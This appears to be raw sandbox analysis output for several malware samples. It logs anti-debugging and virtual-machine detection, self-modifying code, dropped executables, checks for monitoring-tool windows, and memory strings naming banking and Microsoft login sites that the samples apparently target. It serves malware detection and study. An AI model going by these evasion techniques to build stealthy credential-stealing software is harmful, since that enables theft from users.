Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 127B995 second address: 127B999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Special instruction interceptor: First address: 11EB64 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Special instruction interceptor: First address: 2BD951 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Special instruction interceptor: First address: 2C9988 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Special instruction interceptor: First address: 34C619 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Special instruction interceptor: First address: 10AFD25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Special instruction interceptor: First address: 12602FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Special instruction interceptor: First address: 12E7FBF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Special instruction interceptor: First address: 5FECA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Special instruction interceptor: First address: 832B44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: C8ECA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: EC2B44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Special instruction interceptor: First address: BF98DE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Special instruction interceptor: First address: BF99BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Special instruction interceptor: First address: DA8BD9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Special instruction interceptor: First address: DB9652 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Special instruction interceptor: First address: E3273A instructions caused by: Self-modifying code

Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 890000 memory reserve \| memory write watch
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 1A560000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 27F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2A30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2980000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe

Code function: 4_2_04E30CDD rdtsc

4_2_04E30CDD

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1150	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1143	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1137	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1128	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 9746
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8599
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 766
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 9357

Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-KKQ75.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HRDDT.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HRDDT.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-II4D5.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HRDDT.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-SSA0P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Dropped PE file which has not been started: C:\ProgramData\5xtr1\jw4wb1	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-II4D5.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062165001\52d42007e3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-II4D5.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe TID: 4568	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5696	Thread sleep count: 1150 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5696	Thread sleep time: -2301150s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4160	Thread sleep count: 1143 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4160	Thread sleep time: -2287143s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5004	Thread sleep count: 1109 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5004	Thread sleep time: -2219109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3176	Thread sleep count: 313 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3176	Thread sleep time: -9390000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2292	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3092	Thread sleep count: 1137 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3092	Thread sleep time: -2275137s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5908	Thread sleep count: 1128 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5908	Thread sleep time: -2257128s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe TID: 6704	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2968	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4112	Thread sleep count: 8599 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856	Thread sleep count: 766 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com TID: 6332	Thread sleep count: 59 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276	Thread sleep count: 4778 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6072	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088	Thread sleep count: 315 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7132	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5832	Thread sleep count: 9357 > 30
Source: C:\Windows\System32\svchost.exe TID: 3204	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\36469\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\36469

Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2260017887.000000000123F000.00000040.00000001.01000000.00000006.sdmp, 78K21CNZITPIMAK88B8Q.exe, 78K21CNZITPIMAK88B8Q.exe, 00000004.00000000.2221858436.0000000000783000.00000080.00000001.01000000.00000007.sdmp, 78K21CNZITPIMAK88B8Q.exe, 00000004.00000002.2290631650.0000000000783000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2332632391.0000000000E13000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000005.00000000.2260354769.0000000000E13000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000006.00000000.2274184143.0000000000E13000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000006.00000002.2342382405.0000000000E13000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000008.00000000.2495711653.0000000000E13000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000008.00000002.4571788062.0000000000E13000.00000040.00000001.01000000.0000000B.sdmp, f35b37b5a5.exe, 00000017.00000002.2713928467.0000000000D87000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: powershell.exe, 00000031.00000002.3203609892.000001A698228000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Macromedia.com, 0000002C.00000003.3323929117.0000000001800000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343317748.0000000001803000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk7
Source: SQ1NgqeTQy.exe, 00000000.00000003.2077895678.0000000005734000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: SQ1NgqeTQy.exe, 00000000.00000003.2148614904.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2104038300.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2089531197.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2063125342.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2119604771.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2124155867.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2123776546.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2063230360.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2133103490.0000000000F8C000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2089889800.0000000000F93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 21a4f8ff7d.tmp, 00000019.00000002.2720623335.0000000000867000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: powershell.exe, 00000031.00000002.3203609892.000001A698228000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: MSBuild.exe, 00000034.00000002.4569130266.0000000000C98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: chrome.exe, 00000035.00000002.3565366048.000001E9836A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: MSBuild.exe, 00000034.00000002.4566675637.0000000000BC2000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: powershell.exe, 00000031.00000002.3203609892.000001A698228000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: SQ1NgqeTQy.exe, 00000000.00000003.2077895678.0000000005734000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 21a4f8ff7d.tmp, 00000019.00000002.2720623335.0000000000867000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2260017887.000000000123F000.00000040.00000001.01000000.00000006.sdmp, 78K21CNZITPIMAK88B8Q.exe, 00000004.00000000.2221858436.0000000000783000.00000080.00000001.01000000.00000007.sdmp, 78K21CNZITPIMAK88B8Q.exe, 00000004.00000002.2290631650.0000000000783000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2332632391.0000000000E13000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000005.00000000.2260354769.0000000000E13000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000006.00000000.2274184143.0000000000E13000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000006.00000002.2342382405.0000000000E13000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000008.00000000.2495711653.0000000000E13000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000008.00000002.4571788062.0000000000E13000.00000040.00000001.01000000.0000000B.sdmp, f35b37b5a5.exe, 00000017.00000002.2713928467.0000000000D87000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: SQ1NgqeTQy.exe, 00000000.00000003.2078076945.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: chrome.exe, 00000035.00000002.3573162378.000001E9FE9D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node			graph_5-10773
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node			graph_5-10713

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
